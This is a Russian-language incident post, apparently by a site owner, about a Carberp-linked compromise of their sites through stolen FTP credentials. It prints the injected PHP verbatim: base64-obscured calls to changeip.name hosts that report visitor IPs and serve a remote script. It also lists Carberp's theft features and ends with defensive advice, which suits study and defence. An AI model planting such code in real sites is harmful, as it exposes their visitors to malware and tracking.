Вредоносный код на сайте, feelthesame.changeip.name Опции

[Decker]

В один прекрасный день, мы обнаружили на некоторых наших сайтах изменения, которые мы не вносили, а именно, в части скриптов index.php код:

Код

<? function sql2_safe($in) {
        $rtn = base64_decode($in);
        return $rtn;
}
function collectnewss() {

        if (!isset($_COOKIE["iJijkdaMnerys"])) {
        $value = 'yadeor';
        $ip = $_SERVER['REMOTE_ADDR'];
        $get = sql2_safe("aHR0cDovL2N0cmxzaS5jaGFuZ2VpcC5uYW1lOjg4OC9tb3ZlLnBocD9pcD0=").$ip;
        $content = @file_get_contents($get);
        @setcookie("iJijkdaMnerys", $value, time()+3600*24);
        if (!$content)
            echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly9mZWVsdGhlc2FtZS5jaGFuZ2VpcC5uYW1lL3JzaXplLmpzIj48
L3NjcmlwdD4=");
        else
            echo $content;

        }
}
collectnewss ();
?>

В части страниц index.html (.htm):

Код

<script src="http://feelthesame.changeip.name/rsize.js"></script>

Проведенный анализ показал, что ПК одного из контент-менеджеров оказался зараженным вирусом, который проник на него через уязвимость в Java. В результате все сохраненные в FTP клиенте пароли к хостинговым площадкам были украдены. Затем злоумышленники запустили скрипт, который автоматически входил на все украденные ftp аккаунты, искал в них файлы index.php и index.html и внедрял туда свой код. В результате масса паролей оказались скомпроментированы, а значительное количество ресурсов заражено. Т.о. получилась ситуация аналогичная, описанной в статье Троянский вирус ворует пароли от FTP. В настоящий момент работа всех наших ресурсов восстановлена, в отношении скомпроментированных аккаунтов предприняты дополнительные меры безопасности.

p.s. Урок, который можно извлечь из всего этого - "не храните все яйца в одной корзине", не оставляйте сохраненных паролей в браузерах или FTP клиенте, т.к. любой вредоносный код, так или иначе запустившийся на вашей системе без труда выкрадет их. Как показала практика - дело это поставлено у авторов вируса на поток, проверить автоматически все украденные пароли, внедрить вредоносный код и получить в итоге энное количество дополнительных зараженных сайтов - не миф, а реальность. В частности пострадал наш ресурс http://svadbaauto.ru/ и хотя ресурс уже полностью безопасен, в результатах поиска какое-то время он будет отображаться с предупреждением:



p.p.s. Судя по различным форумам мы не первые, вот пример человека, столкнувшегося с 1 в 1 похожей проблемой.

[Decker]

Теперь по традиции, ссылки по теме:

• FileZilla сливает пароли. Проверьте на вирусы.
• Trojan-Spy.Win32.Carberp - не лечится, украли пароли, меняли hosts

Правда, уважаемый Дмитрий Андреев немного не прав, пароли у него "слила" не FileZilla, а вирус, который он успел подхватить, к слову, в нашем случае в качестве "пострадавшего" FTP-клинта был FAR FTP plugin. Т.е. вредонос знает уже как минимум два популярных FTP клиента, а также место и алгоритм по которому они хранят сохраненные пароли. В обоих случаях заражения, после того как злоумышленник (автор вируса) получал пароли на FTP происходило заражение index.php либо index.html сайтов находящихся на этих FTP. Отличительной чертой, явно указывающей на одинаковое происхождение вируса, был редирект / ссылка / внедренный iframe / скрипт обнаруженный на зараженных впоследствие сайтах, ссылающийся на URL в поддомене changeip.name ... в нашем случае это был feelthesame.changeip.name, в другом случае - kinoshkaxa.changeip.name ...

[Decker]

Собственно пойманная нами штука являлась одной из разновидностей трояна Carberp, вот небольшое описание. Там же есть ссылка на sendspace и полное описание в архиве с паролем, приведем здесь лишь некоторые цитаты из него, естественно, без указания контактов, чтобы нас не обвинили в пособничестве созданию и распространению вредоносного ПО. Даже минимальная комплектация, предлагаемая авторами данного трояна (или правильнее наверное будет сказать ботнета) впечатляет:

• Лоадер
• ФТП граббер (31 клиент)
• Пассворд граббер
• Форм граббер (IE, FF, Opera)
• ФТП сниффер
• Граббер basic-авторизации в IE
• Удаление cookie и sol в IE и FF
• DDOS
• Socks5 прокси
• Поддержка инжектов в IE и FF
• Программа для написания и отладки инжектов с удобным GUI
• Шифрование траффика
• Билдер
• Многофункциональная админка бота

Что же касается поддерживаемого граббером ПО, т.е. список софта, откуда потенциально при заражении могут быть сворованы ваши пароли, он довольно внушителен:

Список программ граббера

• Мессенджеры - Miranda, ICQ2003, RQ, Trillian, ICQ99b, MSN, Yahoo, AIM, Gaim, QIP, Odigo, IM2, SIM, GTalk, PSI, Faim, LiveMessenger, PalTalk, Excite, Gizmo, Pidgin, AIMPRO, MySpace, Pandion, QIPOnline, JAJC, Digsby, Astra
• Почтовые клиенты - Becky, The_Bat, Outlook, Eudora, Gmail, MRA, IncrediMail, GroupMailFree, VypressAuvis, PocoMail, ForteAgent, Scribe, POPPeeper, MailCommander, Windows_Mail_Live, Windows_Mail_Vista
• ФТП клиенты - Total Commander, FAR Manager, WS_FTP, CuteFTP, FlashFXP, FileZilla, FTP Commander, FTP Navigator, BulletProof, SmartFTP, TurboFTP, FFFTP, CoffeeCup, Core FTP, FTPExplorer, Frigate3, UltraFXP, FTPRush, SecureFX, Web Publisher, BitKinex, Classic FTP PC, Fling, SoftX FTP Client, Directory Opus, FreeFTP, DirectFTP, LeapFTP, WinSCP
• Браузеры - Firefox, Safari, Opera, IE, Chrome
• Прочее - SysInfo, WinVNC, ScreenSaver, ASPNET, RDP, FreeCall, CamFrog, PCRemoteControl, NetCache, CiscoVPN, Credentials

Плюс, в расширенной версии предлагается универсальный кейлоггер, сканер документов на заданные владельцем ботнета словосочетания и т.п.

Авторы, как видно, работают с большим размахом и постоянно обновляют и совершенствуют свое ПО, еще бы, с расценками от 5000$ до 40000$ за ботнет под ключ, или от 2000$ до 10000$ ежемесячно - почему бы и не "работать". Заказчики подобного рода malware, на мой взгляд, всегда найдутся

Написание компьютерных вирусов давно уже перестало быть прерогативой "энтузиастов-одиночек", работающих из интереса, теперь, как мы видим, процесс поставлен на "широкую ногу" и приносит вполне реальную коммерческую выгоду. Вопрос кто победит в этой "войне", AV-комании или вирусмейкеры, черное или белое, добро или зло ... мы оставим за нашим читателем.

В качестве рекомендаций, как избежать заражения троянами, подобным Carberp, можем порекомендовать следующее:

• Обязательно установите на свой ПК современный антивирус. Следите за тем, чтобы он регулярно обновлялся. Хотя вирусмейкеры постоянно работают над механизмами обхода и отключения AV, да и собственно ни один антивирус никогда не даст вам 100% гарантии детектирования, этот пункт будет крайне не лишним.
• Следите за обновлениями используемого у вас ПО. Включите обновления операционной системы, регулярно проверяйте и устанавливайте (если это не делается в автоматическом режиме) обновления браузеров, плагинов (Flash Player и т.п.), Java'ы. Проверить безопасность вашего web-серфинга вы можете на этом сайте - http://www.surfpatrol.ru/
• Ну и конечно же, по-возможности, старайтесь не посещать "сомнительные" ресурсы в интернете (под сомнительными ресурсами имеются ввиду не только ресурсы XXX-содержания, но и различные варезные сайты и т.п. Даже разыскивая в интернете какой-то только что вышедший фильм, кликнув по яркой баннерной рекламе, а-ля "только у нас, горячая новинка сезона в HD" - есть риск попасть на сайт с вредоносным ПО). Прежде всего, при работе в Интернет, руководствуйтесь здравым смыслом. Пожалуй, этот пункт надо было ставить первым в списке